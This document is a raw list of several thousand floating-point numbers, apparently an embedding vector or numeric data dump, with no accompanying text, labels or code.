-0.0025157176423817873, -0.03960331156849861, -0.0002409123844699934, -0.033542901277542114, -0.009544333443045616, 0.019396547228097916, 0.0029228506609797478, -0.01428409107029438, 0.01667422614991665, 0.0007124828407540917, 0.013733144849538803, 0.02605651505291462, -0.005554024130105972, 0.004780268762260675, 0.004338701721280813, -0.029362192377448082, -0.0005980400019325316, -0.013279424048960209, 0.005906467791646719, -0.006129276938736439, 0.013125483877956867, 0.006854419130831957, 0.00003978282620664686, -0.020676687359809875, -0.01006287056952715, 0.023577257990837097, 0.0002904114662669599, 0.001088726450689137, -0.006984053645282984, 0.00008830078149912879, -0.007944158278405666, -0.029637666419148445, -0.010946005582809448, -0.006587048061192036, 0.008572075515985489, -0.0033482136204838753, 0.015337370336055756, -0.006311574950814247, -0.003741167951375246, -0.020741505548357964, -0.013319935649633408, -0.0003418094711378217, 0.0013267270987853408, 0.005225887056440115, -0.01871596649289131, -0.00790769886225462, 0.016868676990270615, -0.011448338627815247, 0.048450861126184464, 0.005712016019970179, 0.026753300800919533, 0.03070715069770813, -0.021973032504320145, 0.009382289834320545, -0.012979645282030106, 0.018602536991238594, -0.010467978194355965, -0.008053537458181381, -0.009941338561475277, 0.004978771321475506, -0.004075381439179182, 0.006384494714438915, -0.004123994614928961, -0.0017875368939712644, 0.003208451671525836, -0.0033664435613900423, -0.010467978194355965, 0.027401473373174667, -0.008839446119964123, 0.006457414012402296, -0.004735706839710474, 0.010954107157886028, -0.002698016120120883, 0.01090549398213625, -0.00031345195020549, -0.013368547894060612, -0.006190042942762375, 0.02388514019548893, 0.0119587741792202, 0.012088408693671227, -0.0022807554341852665, 0.014429929666221142, 0.021470699459314346, -0.001685247290879488, -0.01084067765623331, -0.0050071291625499725, -0.019331730902194977, 0.01618809625506401, -0.0014533231733366847, 0.018618742004036903, -0.026980161666870117, 0.012566435150802135, 0.004358957055956125, -0.018083998933434486, -0.01967202126979828, 0.008118354715406895, 0.01669042930006981, -0.009852214716374874, 0.029345989227294922, -0.005687709432095289, -0.020741505548357964, -0.01090549398213625, 0.03380217030644417, 0.004488591104745865, 0.02002851665019989, -0.009682069532573223, 0.01495656929910183, -0.010508488863706589, 0.00003141165871056728, -0.013814166188240051, 0.0037188869901001453, 0.012339575216174126, 0.008442441001534462, 0.018537720665335655, 0.013797962106764317, 0.01750064454972744, -0.007968464866280556, 0.0013388803927227855, -0.0016123278765007854, 0.013960004784166813, -0.004853188060224056, 0.007729451637715101, -0.019331730902194977, -0.008146712556481361, 0.004747860133647919, 0.020206762477755547, -0.017792321741580963, 0.010921698994934559, 0.008644994348287582, -0.012282859534025192, 0.021081795915961266, -0.0025744582526385784, 0.002708143787458539, -0.0003851053479593247, -0.01707933284342289, -0.009244553744792938, 0.006578946020454168, 0.0009373174980282784, 0.010816371068358421, 0.01795436441898346, -0.01598554290831089, 0.0070164622738957405, 0.008268244564533234, -0.012274757958948612, 0.007202811539173126, -0.007611970417201519, -0.015078102238476276, 0.005262346472591162, -0.004091585986316204, -0.0033279582858085632, -0.028373731300234795, -0.001962746027857065, 0.023172149434685707, 0.008644994348287582, -0.0117076076567173, -0.002738526789471507, -0.03451516106724739, 0.0032550389878451824, -0.02085493505001068, -0.012274757958948612, 0.022848064079880714, 0.005173223093152046, -0.02219989150762558, -0.0017085409490391612, -0.02681811712682247, -0.0024529260117560625, -0.0029066463466733694, -0.001961733214557171, -0.006858470384031534, -0.011683301068842411, -0.010411263443529606, 0.009706376120448112, 0.006898981053382158, -0.005088150501251221, 0.007733502425253391, -0.016568897292017937, 0.0036945806350558996, 0.0031659153755754232, 0.0035062055103480816, 0.01258263923227787, 0.027125999331474304, 0.009746886789798737, 0.00028408164507709444, 0.006915185134857893, 0.00960915070027113, -0.019866472110152245, -0.021551720798015594, -0.010330242104828358, 0.0022098615299910307, 0.0007160275126807392, 0.006518180016428232, -0.003919415175914764, -0.002035665325820446, -0.005444644950330257, -0.005793037358671427, 0.013117381371557713, -0.0046303789131343365, 0.011950671672821045, 0.006481720134615898, -0.010459876619279385, -0.03279750421643257, -0.005432491656392813, -0.00919594056904316, 0.02007712796330452, -0.0009271898306906223, -0.016058461740612984, -0.003591278102248907, 0.012939134612679482, 0.013530591502785683, -0.00017103133723139763, -0.01128629595041275, -0.011456440202891827, -0.005096252541989088, -0.004942311905324459, -0.005894314497709274, 0.01216132752597332, 0.007927954196929932, 0.013627816922962666, 0.03376976400613785, 0.006570843979716301, -0.007611970417201519, -0.006635661236941814, -0.0012102586915716529, 0.04044593498110771, 0.0060158465057611465, -0.013530591502785683, -0.009430903010070324, -0.004832932725548744, -0.023220762610435486, -0.010435570031404495, -0.0025906625669449568, 0.016431160271167755, 0.013068768195807934, 0.011999284848570824, 0.00006225363176781684, 0.008871854282915592, -0.00207617599517107, 0.004403518512845039, -0.0025602795649319887, -0.00405107531696558, -0.0028843656182289124, -0.016123279929161072, 0.0022098615299910307, 0.020725300535559654, -0.006574895232915878, 0.007514744531363249, -0.005545922089368105, 0.009406596422195435, 0.01595313474535942, 0.004772166721522808, -0.003532537491992116, 0.0035933037288486958, 0.03274889290332794, -0.023350397124886513, 0.01746823638677597, -0.009795499965548515, -0.00024774856865406036, -0.0061616855673491955, -0.030010364949703217, 0.0013014079304412007, -0.0033380859531462193, -0.007024564314633608, 0.001322676078416407, 0.009268860332667828, -0.024598129093647003, 0.013684531673789024, 0.009860317222774029, 0.02733665518462658, 0.012623149901628494, 0.0006426018080674112, 0.026088925078511238, -0.00008064171561272815, -0.025716224685311317, -0.01515102107077837, -0.011440236121416092, 0.0082966024056077, 0.01084067765623331, 0.01792195625603199, 0.007231169380247593, 0.007737553678452969, 0.005477053578943014, -0.016982106491923332, 0.008815139532089233, -0.013157892040908337, -0.007567408494651318, 0.026105128228664398, 0.019931290298700333, -0.007441825233399868, 0.015855908393859863, -0.005764679983258247, 0.005229938309639692, -0.01065432745963335, -0.009001488797366619, -0.0008016065112315118, -0.016803860664367676, -0.012809500098228455, 0.01020870916545391, 0.011553666554391384, 0.009641558863222599, -0.010314037092030048, -0.008612586185336113, -0.007628174498677254, 0.0002980072167702019, -0.004711400251835585, -0.006518180016428232, 0.01022491417825222, 0.0032023750245571136, -0.009690172038972378, -0.004751911386847496, 0.006198144983500242, -0.004861290100961924, -0.013579203747212887, -0.026283375918865204, -0.018634945154190063, 0.01704692468047142, -0.007048870902508497, 0.005570228211581707, -0.01260694582015276, 0.006412852089852095, -0.011837242171168327, 0.008912365883588791, -0.03811251372098923, -0.0007929979474283755, -0.017241375520825386, 0.010832575149834156, -0.00835331715643406, -0.0030342552345246077, 0.03357531130313873, 0.002932978328317404, -0.004614174831658602, 0.014405623078346252, 0.006607303861528635, 0.015823500230908394, -0.0014077486703172326, -0.024128204211592674, 0.016082769259810448, 0.001005173078738153, 0.007178505416959524, 0.022378139197826385, 0.016123279929161072, -0.015612843446433544, -0.006935440935194492, -0.010994617827236652, -0.013263219967484474, 0.0009388366597704589, -0.018083998933434486, 0.002398236421868205, 0.02210266701877117, -0.009114919230341911, 0.0218109879642725, -0.021081795915961266, -0.00003114264109171927, -0.004816728178411722, 0.0038849811535328627, -0.0025319219566881657, -0.03415866568684578, 0.006651865318417549, 0.01706312783062458, 0.01191016100347042, 0.009957542642951012, -0.002406338695436716, -0.015199634246528149, 0.0004202990385238081, 0.009503822773694992, -0.0019840141758322716, -0.01450284942984581, 0.01754925772547722, -0.0014725658111274242, 0.008385725319385529, 0.0027851141057908535, 0.018489107489585876, -0.010686736553907394, 0.00016368876094929874, -0.01879698969423771, -0.007028615567833185, -0.0062751155346632, -0.003028178820386529, 0.013093074783682823, 0.008985284715890884, -0.004561510868370533, 0.026623666286468506, 0.005768731236457825, 0.015167225152254105, -0.000779325608164072, 0.0024144407361745834, 0.007798319682478905, -0.017743708565831184, -0.004764064215123653, 0.008320908062160015, 0.030934009701013565, 0.015434596687555313, 0.004018666688352823, -0.016042258590459824, -0.008418134413659573, -0.026299580931663513, -0.00511245708912611, -0.014105843380093575, 0.007692991755902767, -0.02177857980132103, -0.004245526622980833, -0.008004924282431602, 0.003903210861608386, -0.008065690286457539, 0.0035345631185919046, -0.0014138252008706331, 0.026607461273670197, -0.011343010701239109, 0.003682427341118455, -0.00488964794203639, 0.006104970350861549, 0.003180094063282013, -0.007429671939462423, -0.003647993318736553, -0.0030929958447813988, 0.00768894050270319, 0.004435927141457796, -0.01596933789551258, -0.0019789503421634436, -0.022021645680069923, 0.0005772782023996115, -0.017776118591427803, 0.01193446759134531, 0.015491311438381672, 0.0016862601041793823, 0.009317472577095032, -0.0017824730603024364, 0.01797056943178177, 0.006570843979716301, 0.026769505813717842, -0.012639354914426804, -0.014907957054674625, 0.00023015170881990343, -0.0011201222660019994, -0.018991440534591675, -0.006566792726516724, 0.023674484342336655, 0.011375418864190578, 0.00919594056904316, -0.010022359900176525, 0.00800897553563118, -0.024581924080848694, 0.006574895232915878, -0.002809420693665743, 0.00133482925593853, -0.023285580798983574, 0.00630347291007638, -0.0251004621386528, -0.011383521370589733, -0.005128661170601845, 0.02043362334370613, -0.00392549205571413, 0.0028641100507229567, 0.000814772502053529, -0.017160354182124138, -0.02519768849015236, 0.0034130308777093887, 0.01216132752597332, -0.004168556537479162, 0.02129245176911354, 0.008268244564533234, -0.01112425234168768, -0.0035386141389608383, -0.0024772323668003082, -0.0007048870902508497, -0.0010092240991070867, -0.0036277377512305975, 0.01213702093809843, -0.0015576384030282497, 0.005788986571133137, -0.008628790266811848, -0.024128204211592674, 0.0029876679182052612, -0.008604483678936958, 0.014656789600849152, -0.0009484579786658287, -0.01703071966767311, -0.020579462870955467, 0.011002720333635807, 0.02383652701973915, 0.004561510868370533, -0.009965645149350166, 0.008588279597461224, 0.01711174100637436, -0.03114466555416584, -0.004982822574675083, -0.02168135531246662, 0.0003007923369295895, -0.013911392539739609, -0.006027999799698591, 0.02095216140151024, -0.006915185134857893, 0.018991440534591675, -0.025764837861061096, -0.0001119109510909766, -0.015823500230908394, -0.01603415608406067, -0.002898544305935502, 0.0128013975918293, 0.008292551152408123, 0.002616994548588991, -0.013765553943812847, -0.00489369872957468, 0.003917389549314976, -0.0037492699921131134, 0.01383847277611494, -0.005355521570891142, 0.008580177091062069, -0.004930158611387014, 0.011853446252644062, -0.006765295751392841, 0.023269375786185265, 0.021422086283564568, 0.005282602272927761, -0.00191413308493793, 0.009576741605997086, -0.005165121052414179, 0.018651150166988373, 0.002288857474923134, -0.01741962321102619, 0.00019255267397966236, 0.021049385890364647, 0.008175069466233253, -0.0037857298739254475, -0.009309371002018452, -0.007352701388299465, -0.007344599347561598, -0.0010998669313266873, 0.0015282680978998542, 0.008369521237909794, -0.0013439442263916135, -0.011407827958464622, 0.035130925476551056, 0.01492416113615036, -0.023350397124886513, -0.015880214050412178, -0.01408153772354126, 0.015013284981250763, 0.01660940796136856, 0.009333677589893341, 0.006728835869580507, 0.006125225685536861, -0.0032611156348139048, -0.012534026987850666, 0.024614332243800163, 0.0030362808611243963, -0.003639891045168042, -0.010184403508901596, -0.023771708831191063, 0.012955338694155216, 0.016139483079314232, 0.01876457966864109, -0.05681227892637253, -0.012371983379125595, -0.008122405968606472, -0.010305935516953468, -0.02558659017086029, 0.01235577929764986, -0.006339932791888714, 0.010711043141782284, -0.00028332206420600414, 0.002264551119878888, -0.02344762347638607, -0.023982364684343338, 0.003161864122375846, 0.0073364973068237305, -0.015872113406658173, 0.002981591271236539, 0.008385725319385529, 0.012566435150802135, -0.024468494579195976, 0.0073364973068237305, -0.026137536391615868, -0.0050111799500882626, -0.00027066245093010366, -0.012047898024320602, 0.007291935384273529, -0.03843660280108452, 0.00013039397890679538, -0.022848064079880714, 0.01741962321102619, 0.00978739745914936, 0.00585785461589694, 0.0033279582858085632, -0.0056512500159442425, -0.012323371134698391, -0.0020285758655518293, 0.008474849164485931, 0.003390749916434288, 0.0011920288670808077, 0.008393827825784683, -0.019882677122950554, 0.0080008739605546, 0.02043362334370613, -0.016512181609869003, -0.027028772979974747, 0.01835947297513485, 0.0053150104358792305, -0.02351243980228901, 0.014916058629751205, -0.027984827756881714, -0.022313322871923447, 0.009520026855170727, -0.011229580268263817, -0.02213507518172264, -0.015888316556811333, 0.02352864481508732, -0.00936608575284481, -0.012639354914426804, -0.018100203946232796, 0.022507773712277412, -0.00788339227437973, 0.0009125046781264246, -0.021454494446516037, 0.03636245056986809, 0.007324344012886286, 0.01109184417873621, -0.012687967158854008, -0.006408800836652517, -0.021195225417613983, -0.0024326706770807505, 0.004383263178169727, 0.004391365684568882, 0.00958484411239624, -0.011942570097744465, 0.000642095401417464, -0.023236967623233795, -0.005108405835926533, 0.0062021962366998196, 0.005319061689078808, -0.011829139664769173, -0.005744424648582935, 0.015710068866610527, -0.009430903010070324, 0.0019171712920069695, 0.0046303789131343365, -0.010540897957980633, 0.0009732707985676825, -0.011326806619763374, -0.006489822641015053, 0.01660940796136856, 0.0091392258182168, -0.024938419461250305, -0.002347598085179925, -0.012266655452549458, -0.016933495178818703, 0.018683558329939842, -0.007972516119480133, 0.010127687826752663, 0.012461107224225998, -0.014421828091144562, 0.012517821975052357, -0.006449311506003141, 0.004237424582242966, -0.0016265066806226969, 0.010070973075926304, -0.0007038743351586163, 0.021260041743516922, -0.02263740822672844, -0.01277709100395441, -0.007295986637473106, 0.010946005582809448, -0.0029451316222548485, -0.015078102238476276, -0.017257580533623695, -0.0009788410970941186, 0.011999284848570824, -0.007109636906534433, 0.003903210861608386, -0.005055741872638464, -0.017371010035276413, -0.027920009568333626, 0.008952876552939415, -0.007032666355371475, 0.014575768262147903, 0.006271064281463623, 0.0010553051251918077, 0.00649792468175292, -0.005951029248535633, -0.0213086549192667, 0.0020802270155400038, -0.013336139731109142, 0.019753042608499527, 0.0009783346904441714, -0.01517532765865326, 0.02471155859529972, -0.03616799786686897, 0.019380344077944756, 0.01593692973256111, -0.0004076394543517381, -0.01603415608406067, 0.014227376319468021, 0.00026585182058624923, 0.009576741605997086, 0.0024022876750677824, -0.014883650466799736, -0.012250451371073723, 0.009965645149350166, -0.00036763507523573935, 0.0002192644460592419, 0.025716224685311317, -0.011942570097744465, 0.008069741539657116, 0.006019897758960724, 0.003220604732632637, -0.02553797885775566, 0.01660940796136856, 0.005448696203529835, -0.006789601873606443, 0.013117381371557713, -0.014429929666221142, -0.010087177157402039, -0.0016720813000574708, 0.0035446907859295607, -0.011974978260695934, 0.026234762743115425, -0.013506284914910793, -0.006339932791888714, -0.0024326706770807505, -0.0030909704510122538, 0.010467978194355965, 0.03448275104165077, -0.0058457013219594955, 0.02553797885775566, 0.0010826498037204146, 0.0119587741792202, 0.008154814131557941, 0.014624381437897682, 0.011634687893092632, 0.0008218619041144848, 0.010986516252160072, 0.007494489196687937, 0.02085493505001068, -0.016431160271167755, -0.011270090937614441, 0.0020295886788517237, 0.008604483678936958, -0.02639680542051792, -0.0044966936111450195, -0.005529717542231083, 0.027417676523327827, -0.012501617893576622, -0.011108048260211945, -0.007842881605029106, -0.014762118458747864, 0.0025926881935447454, 0.015774887055158615, -0.04226081818342209, 0.0019222351256757975, -0.010630020871758461, 0.007020513527095318, 0.018878011032938957, 0.0071501475758850574, -0.010719144716858864, 0.012363881804049015, -0.021211430430412292, -0.017144151031970978, -0.004986873362213373, -0.025489365682005882, -0.010216811671853065, 0.0016386599745601416, -0.015321166254580021, -0.008474849164485931, -0.003119327826425433, 0.0010168198496103287, -0.031306710094213486, 0.011059435084462166, 0.024808784946799278, -0.01835947297513485, 0.010143891908228397, 0.0072068627923727036, -0.010589510202407837, -0.0025136922486126423, -0.0037290146574378014, 0.007275730837136507, 0.014365112408995628, -0.002598764840513468, -0.0004476438043639064, -0.016836268827319145, -0.0018695711623877287, 0.009041999466717243, 0.006773397792130709, 0.0070367176085710526, -0.017776118591427803, 0.00459797028452158, -0.005541870836168528, -0.015304962173104286, -0.000012137401427025907, 0.017808526754379272, -0.009082510136067867, 0.0014219273580238223, 0.016163790598511696, 0.009706376120448112, 0.027061183005571365, -0.0011940543772652745, 0.026250967755913734, -0.017646484076976776, 0.003793831914663315, 0.005420338828116655, -0.015086203813552856, 0.004057151731103659, -0.028357526287436485, -0.01153746247291565, -0.01840808615088463, 0.019769247621297836, -0.005740373395383358, 0.007210914045572281, 0.008888059295713902, -0.011845343746244907, -0.00191413308493793, 0.004036896396428347, 0.01832706481218338, 0.006287268828600645, -0.019023848697543144, 0.010597612708806992, -0.0006248783320188522, 0.012704172171652317, 0.00897718220949173, 0.006967849563807249, -0.015499413944780827, 0.00956053752452135, 0.0024124153424054384, -0.011132354848086834, 0.01795436441898346, 0.002736501395702362, 0.0044804890640079975, 0.009827908128499985, -0.005448696203529835, -0.0004324522742535919, -0.014543360099196434, -0.009374188259243965, 0.005027384497225285, -0.019947493448853493, 0.009673967957496643, 0.000802112917881459, 0.01748444139957428, -0.013230811804533005, -0.017273785546422005, -0.008612586185336113, -0.0071663521230220795, 0.0030038722325116396, -0.00765653233975172, 0.011780526489019394, -0.013984311372041702, -0.04222840815782547, -0.015645252540707588, -0.006056357640773058, 0.01570196822285652, -0.009317472577095032, 0.0091392258182168, 0.007020513527095318, 0.001971860881894827, 0.016568897292017937, -0.0013550847070291638, 0.015207736752927303, 0.012023591436445713, 0.010573306120932102, 0.004719502758234739, 0.008385725319385529, -0.00025293900398537517, 0.0006831125356256962, 0.02134106494486332, 0.016309628263115883, 0.022767042741179466, -0.006489822641015053, -0.0201257411390543, 0.007936056703329086, -0.016552694141864777, 0.004342752508819103, -0.0007464106311090291, -0.01753305271267891, -0.01151315588504076, 0.008385725319385529, 0.003623686730861664, -0.0011120201088488102, -0.0014350933488458395, -0.007891494780778885, -0.008239886723458767, -0.004358957055956125, -0.009357983246445656, 0.009349881671369076, -0.030593719333410263, -0.014340805821120739, -0.005274499766528606, -0.013328037224709988, -0.006542486604303122, 0.0058416505344212055, -0.019688226282596588, 0.008782731369137764, 0.0017450005980208516, 0.013960004784166813, -0.018521515652537346, 0.019040053710341454, -0.009989951737225056, 0.013182198628783226, -0.01573437638580799, -0.0008243938209488988, 0.010022359900176525, -0.02652643993496895, 0.025781042873859406, -0.007607919164001942, 0.0022848064545542, 0.0052947551012039185, 0.019801655784249306, 0.02137347310781479, -0.02258879505097866, 0.005282602272927761, 0.009439005516469479, 0.005003077909350395, 0.021454494446516037, 0.007887443527579308, 0.01579919271171093, -0.004354905802756548, 0.0030443829018622637, 0.01959099993109703, -0.009325575083494186, -0.009033897891640663, -0.014130149967968464, -0.008596381172537804, 0.004269833210855722, 0.01925070956349373, -0.013044462539255619, 0.02430645190179348, 0.018975235521793365, -0.012914828024804592, 0.023123538121581078, 0.008049486204981804, -0.01196687575429678, 0.008685505017638206, 0.017646484076976776, 0.011002720333635807, 0.007915801368653774, -0.010881188325583935, 0.0011565819149836898, -0.010565204545855522, 0.014235477894544601, -0.0034859501756727695, -0.008661198429763317, 0.007146096788346767, 0.003111225785687566, -0.008491053245961666, -0.01703071966767311, 0.009430903010070324, 0.02349623665213585, -0.01754925772547722, -0.0004081458318978548, -0.031355321407318115, -0.0031881961040198803, 0.022426752373576164, 0.0027527057100087404, 0.010500387288630009, 0.002329368144273758, 0.004776217509061098, 0.03232758119702339, -0.012914828024804592, 0.004354905802756548, 0.007089381571859121, 0.01665802113711834, 0.002339495811611414, 0.00024129216035362333, 0.001228488516062498, 0.0031922473572194576, -0.027936214581131935, -0.004379212390631437, 0.005663403309881687, 0.010184403508901596, 0.017192762345075607, 0.01965581625699997, 0.004755962174385786, -0.00977929588407278, -0.012679865583777428, 0.0024630536790937185, 0.008734118193387985, 0.007611970417201519, 0.0010061857756227255, 0.002096431329846382, 0.00800897553563118, -0.016277220100164413, 0.010889289900660515, 0.02856818214058876, 0.00009165557275991887, -0.02349623665213585, 0.0023030361626297235, 0.002799293026328087, -0.0009125046781264246, 0.022442957386374474, 0.007458029314875603, 0.02049843966960907, 0.000697797688189894, 0.012793295085430145, 0.01344146765768528, -0.027936214581131935, 0.009876521304249763, 0.008458645083010197, -0.025829656049609184, 0.007133943494409323, 0.004484540317207575, -0.01639064960181713, 0.009803601540625095, 0.002967412583529949, -0.010808268561959267, -0.011415929533541203, 0.01578298956155777, 0.0055216155014932156, -0.006793653126806021, -0.002614969154819846, -0.0039963857270777225, 0.00035953291808255017, -0.01430839765816927, -0.02604031190276146, 0.004812677390873432, 0.005724169313907623, 0.007012411020696163, 0.00016432174015790224, -0.016026053577661514, 0.02085493505001068, -0.011667096987366676, -0.005071945954114199, 0.011010822840034962, 0.003909287508577108, -0.014438032172620296, 0.005205631721764803, -0.0038080106023699045, -0.018229838460683823, 0.01881319284439087, -0.006092817056924105, 0.002254423452541232, 0.011326806619763374, 0.008345214650034904, 0.0009651686414144933, -0.006647814530879259, -0.0179381612688303, 0.0059793870896101, 0.0070164622738957405, -0.026575053110718727, -0.004128045402467251, -0.02382032200694084, -0.017241375520825386, -0.0028357526753097773, -0.020141946151852608, 0.0025582539383322, 0.014559564180672169, -0.017776118591427803, 0.0005793037707917392, -0.008065690286457539, -0.020676687359809875, 0.010087177157402039, 0.001078598783351481, 0.007579561788588762, 0.0017693070694804192, 0.025003235787153244, 0.017678892239928246, 0.012007386423647404, 0.012687967158854008, -0.010548999533057213, 0.017630279064178467, 0.004974720533937216, -0.006963798310607672, -0.007911750115454197, -0.007231169380247593, 0.007838830351829529, 0.020611871033906937, -0.02897329069674015, -0.005477053578943014, 0.016163790598511696, -0.00812645722180605, -0.030447881668806076, -0.007838830351829529, -0.012623149901628494, 0.008037333376705647, -0.007470182608813047, 0.00553781958296895, -0.02472776360809803, -0.013571102172136307, 0.008896160870790482, 0.016123279929161072, 0.027190817520022392, 0.026186149567365646, 0.015556128695607185, 0.0009737772052176297, 0.01554802618920803, -0.003502154489979148, 0.006453362759202719, 0.004658736288547516, -0.00662350794300437, 0.015726273879408836, -0.0007940107607282698, 0.02472776360809803, 0.0017693070694804192, 0.007223066873848438, -0.024857398122549057, -0.010346446186304092, 0.008507258258759975, -0.01635824143886566, 0.003208451671525836, 0.007826677523553371, 0.0021936572156846523, -0.0029147486202418804, -0.012274757958948612, 0.009649661369621754, 0.001733860233798623, 0.003321881638839841, 0.030998827889561653, 0.010751553811132908, -0.009114919230341911, -0.006048255134373903, 0.010816371068358421, -0.002365828026086092, 0.0012001310242339969, -0.0008912365301512182, -0.01258263923227787, 0.004488591104745865, 0.007056972943246365, -0.006125225685536861, 0.009601048193871975, -0.014940365217626095, -0.021519310772418976, -0.001243680133484304, -0.012347676791250706, 0.02767694555222988, 0.0049544647336006165, 0.009341779164969921, 0.0025501518975943327, 0.009503822773694992, -0.0027932163793593645, 0.005707964766770601, 0.0022037848830223083, -0.027936214581131935, 0.0021551719401031733, -0.010362650267779827, -0.009228349663317204, 0.023366602137684822, 0.010176301002502441, 0.008709811605513096, -0.013627816922962666, 0.003722938010469079, -0.02210266701877117, -0.030496494844555855, -0.008758424781262875, 0.018002977594733238, 0.023658279329538345, 0.002961335936561227, 0.013060666620731354, 0.011172865517437458, -0.010824472643435001, -0.006469567306339741, 0.00746208056807518, 0.00758766382932663, -0.0006314613274298608, -0.010281628929078579, -0.00726762879639864, 0.008685505017638206, -0.014008617959916592, 0.011083741672337055, -0.03422348201274872, -0.01003046240657568, 0.03140393644571304, -0.004415671806782484, 0.02521389164030552, -0.000817304418887943, 0.01884560100734234, 0.007381059229373932, -0.00575657794252038, 0.007243322674185038, 0.006461464799940586, 0.0028519569896161556, 0.009884623810648918, -0.01302825752645731, -0.02523009665310383, -0.00785908568650484, 0.018246043473482132, -0.006064459681510925, 0.010111483745276928, -0.0025947135873138905, 0.008823242038488388, -0.007571459747850895, 0.0008041384280659258, -0.03255444020032883, 0.015191531740128994, -0.010735349729657173, -0.006757193244993687, -0.009114919230341911, 0.0009687133715488017, 0.0005894314381293952, 0.015167225152254105, -0.01965581625699997, -0.028065849095582962, 0.005201580468565226, -0.00029724763589911163, 0.006518180016428232, 0.004938260652124882, -0.002138967625796795, -0.011051333509385586, 0.0016741068102419376, -0.007644379045814276, 0.0033036519307643175, -0.0010563178220763803, -0.0091392258182168, 0.0025521772913634777, 0.016479773446917534, 0.03399662300944328, -0.00659920135512948, -0.005371725652366877, 0.00649792468175292, -0.008693607524037361, -0.007008360233157873, 0.0074904379434883595, -0.017662687227129936, -0.01876457966864109, 0.0022908831015229225, 0.017743708565831184, -0.0035487418062984943, 0.002479257993400097, 0.007992771454155445, 0.0016538514755666256, -0.002659530844539404, -0.021000774577260017, 0.017695097252726555, 0.0025258453097194433, -0.002951208269223571, -0.0038870065473020077, 0.0046708895824849606, -0.007603868376463652, -0.016949698328971863, -0.0006324741407297552, -0.005209682509303093, 0.002337470417842269, 0.008936671540141106, 0.01282570417970419, 0.02427404187619686, -0.0043062930926680565, 0.020303988829255104, 0.015580435283482075, 0.003398852190002799, -0.025084257125854492, 0.007304088678210974, 0.026088925078511238, 0.021000774577260017, 0.0325058288872242, 0.00756335724145174, -0.00047549494775012136, 0.015507515519857407, -0.0029653869569301605, 0.008985284715890884, -0.007247373461723328, 0.005347419064491987, -0.022540181875228882, 0.0011302499333396554, 0.0037735765799880028, 0.02082252688705921, -0.0037553466390818357, -0.011059435084462166, -0.023204559460282326, -0.017792321741580963, -0.0012051948579028249, 0.028892267495393753, -0.005363623611629009, -0.019477570429444313, -0.012363881804049015, 0.008993387222290039, -0.0017652560491114855, -0.007243322674185038, 0.008385725319385529, -0.0014857318019494414, 0.0239175483584404, 0.003419107524678111, -0.0048005240969359875, 0.01837567798793316, 0.010176301002502441, -0.004715451505035162, -0.0013692633947357535, 0.017581665888428688, 0.011553666554391384, -0.00849915575236082, -0.011877752840518951, -0.011375418864190578, -0.030836785212159157, -0.01959099993109703, 0.008596381172537804, 0.00292892730794847, 0.0024103897158056498, -0.0016487876418977976, -0.01494846772402525, -0.02944321371614933, 0.01411394588649273, 0.0027547311037778854, 0.00941469892859459, -0.004022717475891113, 0.0012619099579751492, -0.007417518645524979, -0.019963698461651802, -0.016244811937212944, -0.007344599347561598, 0.0032023750245571136, 0.013935699127614498, -0.022394344210624695, -0.005201580468565226, -0.004788370802998543, 0.006971900351345539, -0.002128839958459139, 0.015159123577177525, -0.011553666554391384, -0.008215580135583878, -0.009439005516469479, 0.0031983237713575363, 0.009471413679420948, 0.012080306187272072, 0.002274678787216544, 0.007749706972390413, -0.007069126237183809, 0.0012882419396191835, -0.008345214650034904, -0.0007854021969251335, 0.0117076076567173, 0.003643942065536976, 0.019445160403847694, 0.008482951670885086, -0.01191016100347042, 0.02051464468240738, 0.013174096122384071, -0.01005476899445057, -0.001916158595122397, -0.022329526022076607, 0.005902416538447142, -0.004873443394899368, -0.008466747589409351, -0.02811446227133274, 0.014543360099196434, -0.005193478427827358, 0.01643926277756691, -0.0059955911710858345, -0.009892725385725498, 0.0027425778098404408, -0.006773397792130709, 0.0046506342478096485, 0.014211172237992287, -0.010621919296681881, 0.01084067765623331, 0.004322497174143791, 0.0013611612375825644, -0.008458645083010197, -0.03409384936094284, -0.004030819982290268, -0.008256090804934502, 0.009917031973600388, -0.011172865517437458, -0.0039761303924024105, -0.02772555872797966, -0.01470540277659893, 0.015467004850506783, 0.0031861707102507353, -0.026963956654071808, -0.006514128763228655, 0.01704692468047142, -0.0020417419727891684, 0.0038181382697075605, 0.00026559861726127565, 0.019056256860494614, 0.007575510535389185, -0.003419107524678111, 0.006858470384031534, -0.012388188391923904, -0.0005291717243380845, -0.0030180509202182293, -0.024128204211592674, 0.018861806020140648, 0.0003970053803641349, -0.014170660637319088, 0.0030524851754307747, 0.0004430863482411951, -0.018683558329939842, -0.004415671806782484, -0.038209740072488785, -0.011424032039940357, -0.011343010701239109, 0.002959310542792082, 0.003937644883990288, 0.015556128695607185, -0.01154556404799223, -0.011974978260695934, -0.019753042608499527, 0.008458645083010197, 0.008758424781262875, -0.004525050986558199, 0.0016984132817015052, 0.007846932858228683, 0.007291935384273529, 0.005574279464781284, -0.002977540250867605, 0.06173838675022125, 0.004776217509061098, 0.005209682509303093, 0.010241118259727955, 0.010954107157886028, 0.002286831848323345, -0.01087308581918478, -0.006477669347077608, -0.0028154973406344652, 0.0006689337897114456, -0.004508846905082464, -0.01554802618920803, 0.005894314497709274, -0.01745203137397766, 0.008187223225831985, -0.002566356211900711, 0.023285580798983574, -0.02301010675728321, -0.02182719297707081, -0.008588279597461224, -0.004618225619196892, -0.009106816723942757, 0.004358957055956125, -0.013992413878440857, -0.01472970936447382, 0.001132275559939444, -0.008393827825784683, -0.00820342730730772, 0.024452289566397667, -0.020206762477755547, 0.016123279929161072, -0.006647814530879259, 0.005541870836168528, 0.009082510136067867, -0.0033826478756964207, 0.04089965671300888, -0.011132354848086834, 0.022297117859125137, -0.010022359900176525, -0.024500902742147446, 0.013984311372041702, 0.015710068866610527, 0.006959747057408094, 0.003641916671767831, 0.014818833209574223, -0.007101534865796566, 0.009657762944698334, -0.024808784946799278, -0.004897749982774258, -0.022734634578227997, -0.019477570429444313, 0.0029755146242678165, 0.0023536747321486473, -0.0014705403009429574, 0.013157892040908337, -0.022037848830223083, 0.0033664435613900423, -0.0065222312696278095, -0.00029724763589911163, 0.010816371068358421, -0.003289473010227084, -0.0076605831272900105, -0.010305935516953468, 0.009066306054592133, -0.002556228544563055, -0.001307484577409923, 0.013562999665737152, 0.011845343746244907, -0.011375418864190578, 0.01557233277708292, -0.013506284914910793, -0.018440494313836098, 0.0073405480943620205, 0.016131380572915077, -0.015710068866610527, -0.02477637678384781, 0.00524209113791585, 0.004383263178169727, 0.007919851690530777, 0.009981849230825901, -0.018489107489585876, 0.0004208054451737553, -0.005375776905566454, 0.006923287641257048, -0.01665802113711834, 